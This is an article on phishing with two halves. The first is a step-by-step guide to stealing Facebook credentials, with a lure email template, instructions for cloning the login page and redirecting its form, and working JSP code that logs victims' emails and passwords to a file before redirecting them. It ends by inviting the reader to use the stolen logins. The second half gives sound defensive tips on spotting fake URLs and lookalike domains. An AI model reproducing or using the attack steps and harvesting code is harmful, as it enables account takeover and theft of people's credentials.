Cyber Security Phishing Attack and Defense

Sisay A. Chala

In this article, I will try to show how phishing, a technique that eludes users to provide information to
unintended recipient, is launched and how to defend yourself against such attack.

A few days ago, I received a Whatsapp message from a friend. As shown in Figure 7, the message (in
German) states that my friend won a voucher worth 250 and I should also click the given link to get a
voucher of same worth. Then I decided to share my thoughts. I hope that reading through this article helps
you tell if the message you receive is genuine or not.

Warning!
At the end of this article, I hope that the reader is able to apply phishing to hack a target user.
However, it is important to note that hacking is a crime! This material is solely aimed at sharing
knowledge for academic purpose with the intention of informing readers how to defend against
phishing attacks. The author will not bear any direct (or implied) responsibilities to damages on you
or the user you attacked. Try it at your own risk!

I. What is Phishing?
Phishing is the process by which a user is tricked to provide information to the attackers. Phishers
use email, telephone or messages to entice, scare or urge a user so that the user gives personal
details, credit card number, username and passwords or any other private information. The
commonest phishing attack happens when a user receives an email (or other form of message) that
promises a user something appealing and trick the user to click a link they say is reputable but that
takes the user to a website controlled by the criminal. For example, the user may be given a link that
the attacker claims is the bank website but the link takes the user to another address.
The attackers use techniques called social engineering that exploit user's ego, fear, or greed to trick
the user. They may come in the form of financial promises, travel promises, system update
warnings, etc. In a nutshell, phishing attack is an attack launched by the help of the victim in most
cases.
Attackers may also use malicious software that is embedded into websites, pirated software, images,
etc. that run in the system without the awareness of the user. These software may capture everything
the user types, screenshots or even take the picture of the user through webcams and transfer this
information to the attacker. They may also force the user's browsers to open the phishing site where
the user will give private information.
Reports by Anti-Phishing Working Group show that phishing attack is growing at an alarming rate
and that in the first quarter of 2016 alone, it grew by 250% i

II. Purpose of this Article

The purpose of this article is to show one of the many ways of phishing and how phishing attack
works with example use case. It also provides tips of how phishing attack can be launched on a

i http://docs.apwg.org/reports/apwg_trends_report_q1_2016.pdf
target user and ways to defend yourself in the likely event of you being a target.

This article helps users increase their security awareness while using the Internet by:
1. helping users understand the risks of clicking a link in relation to phishing attack,
2. advising users to be cautious of the links they see on messages, emails and other contents
they receive before opening them,
3. advising users to be cautious of the web pages they browse and the URLs to which they are
redirected to,
4. showing some tricks that are used by hackers to circumvent user's cautions in URL names,
and personalized messages,
5. showing those who aspire to be security professionals on how easily phishing can be
performed.

III. Step-by-step Procedure:

Figure 1: Workflow of Phishing Attack

The procedure of how phishing attack works shown in Figure 1 is described in the following six
steps:

1) Prepare a content that appeals, or urges the user for action. See the following example:
Dear Mr. Gullible User,
I have been following your posts on facebook. The points you have been
raising are very interesting.
.
.
.
I want to follow your footsteps and write few posts on regular basis. I
have written my first post that I think is interesting for you too. As I
would like to get your insightful advice, can you please spare a little
of your precious time to see my post and give me your feedback?
Click here to get to the post.

Thank you in advance.

Yours sincerely,
Naughty Guy
2) Now prepare the fake web page that looks exactly like the actual web page, Facebook ii in

ii There is no intention to take Facebook as a target, it is used only as an example because it is used by many users
 this case. The target user is sent the above message with the link directing the user to this
fake web page which is controlled by the criminal. The criminal may have written code to
direct the user to the actual web page after capturing what they want. In this case, the user
may not even know what happened in between.

To create the fake web page that exactly looks like the actual page, the easy short-cut is to
save the actual page and edit part of the code that communicates with the server side
application. In this example, let us save the Facebook front page and edit part of the code.

Figure 1: Look-and-feel of facebook page

Now, right-click on the page and click view page source from the menu that appears and
search for text action= in the source to get to get the following.

Figure 2: part of code that sends to server-side application

This is the part of the code that sends the user name (i.e., email or phone in the case of
facebook) and password to the server side application.
All you need to do to redirect the user information is to replace the url
https://www.facebook.com/login.php?login_attempt=1&lwv=110 with your own url
that we will create in step 3.
Now, you save the modified page on your server (or upload it to a hosting site. But be
careful, most hosting sites do not allow phishing!), put the link to the new file into the
message you created in step 1 and get ready to send it to the victim.

3) Now create the server side application that captures the user inputs from the fake page we
created in step 2, saves the content and redirects the user to the actual Facebook site with
content to verify the password. To do that, you need names of two variables that will hold
the email and password from the web page. In the page source you got in step 2, just near
 where you edited the value of action, you will find two input elements for email and
password as name=email and name=pass, respectively. Then use these names in the
server side application code.

Figure 3: User name field

Figure 4: Password field

Here is an example code in Java Server Page (JSP) for server side application that captures the form
inputs.
<%@ page import="java.io.*" %>
<%@ page import="javax.sevlet.http.*"%>
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>This is a Test</H1>
<!-- Here comes some content-->
<BR>
<BR>
<%
String email_inupt = request.getParameter("email");
String pass_inupt = request.getParameter("pass");
String file = application.getRealPath("data.txt");
FileWriter filewriter = new FileWriter(file, true);
filewriter.write("<B>Email: </B>" + email_input + "<BR>");
filewriter.write("<B>Password: </B>" + pass_input + "<BR><BR>\n");
filewriter.close();
%>
<!--jsp:include page="test.txt" flush="true"/-->
<% String redirectURL = "http://www.facebook.com";
response.sendRedirect(redirectURL);%>
</BODY>
</html>

4) Upload the files to the web server. Make sure that on your server (or the folder in the hosting
 siteiii), you have two files: one facing the user (i.e., the facebook page) that you created on
step 2 and another server side application that you created on step 3. Now update the
message you created in step 1 to include the link (that you want the user to click) to point to
the fake page you saved.

5) Now you are ready to send the message to the user and launch phishing attack. Send the
message and watch the content of the file that the server side application created.

6) The last step is, to use the data collected? Did you want to use the login information to get
access to their accounts? Did you want to publish account information on websites and make
news? :-) That is up to you!

IV. Defense Against Phishing - Some Tips

As stated earlier in this article, Phishing is a kind of cyber attack which is launched mostly by the
help of the victim! So, the victim can drastically reduce the risk of phishing attack just by refraining
from responding to some requests that urge him/her to click a link or enter data.
The defense against phishing depends on how the type of phishing that is launched. As we have
seen in the above section, understanding some of the tricks used by hackers will help reduce the risk
of being a victim. The following are some of the things we need to note in order to know whether
there is a phishing attack attempt under way.
Don't be tempted to offers that are too good to be true. Always, remember that there is NO
FREE MONEY!
Do not rush to take action when you receive a message that urges you to take action. Check-
check-check the URL, search the content on the Internet and then take action, if you have to.
Attackers try to make the page look-and-feel near perfect so that the user doesn't doubt it on
a first glance. e.g., they save the target web page and modify value of action in form as
shown in step 2 above. This makes the web page exactly the same as the original one.
Attackers may use logo of companies so that you trust the source. Don't use logo to verify
authenticity!
Attackers try to make the URL look similar to the original url, by renting a domain name
with similar topography of text. For example, to target www.facebook.com, they can rent
domains such as www.face6ook.com, www.facehook.com or www.facedook.com.
Note that, when you hover your mouse pointer on the link, you will see the URL on the
status bar of your browser. If the URL you see on the provided address is different from the
one you see on the status bar (compare Figure 5 & 6) , NEVER click that link even if you
trust the source!

iii For one of the many hosting sites is http://www.000webhost.com

 Address bar

Check URL

Figure 5: Given address different from real address

In the email that contains the link, attackers try to make sure to send message that looks
natural. To do this, first they study the target user, i.e., his/her interactions, needs, activities,
connections, You can find such emails on anti-social-engineering websites such as hoax-
slayeriii For example, your Facebook status update gives them a lot of information to create a
personalized message that you (or your friends or relatives) will believe and get fooled.

Address bar

Check URL

Figure 6: Given address same as real address

Read URLs in reverse. When you read urls, start by the root (i.e. com, net, org, etc) to see if
the url belongs the the legitimate site you know. For example
www.google.myfakegoogle.com is not google's site! In the message I received (see Figure
7), the domain is not lidl.de rather it is de-guscheine250.com

iii http://www.hoax-slayer.com/
 Figure 7: Whatsapp message offering a voucher worth 250

Because attackers may trick your friends/colleagues to send you the message, it is wise to
use your instinct when you receive messages that have something suspicious irrespective of
whether or not you know (and trust) the sender.
Remember: NO credible company requests you to provide personal information via email.
Most of all, NO company asks you for password!
If you notice any of the above (or anything else that is suspicious), be cautions. The baseline is to
always remember that there is NO FREE MONEY!

V. Conclusion
This article briefly discusses one of the commonest cyber attacks phishing attack and provides
steps-by-step procedure of how to implement and execute the attack. The article also highlights
methods used by criminals to lure victims into unintended website. It concludes by providing tricks
to avoid these attacks.

Further Reading
http://computer.howstuffworks.com/phishing.htm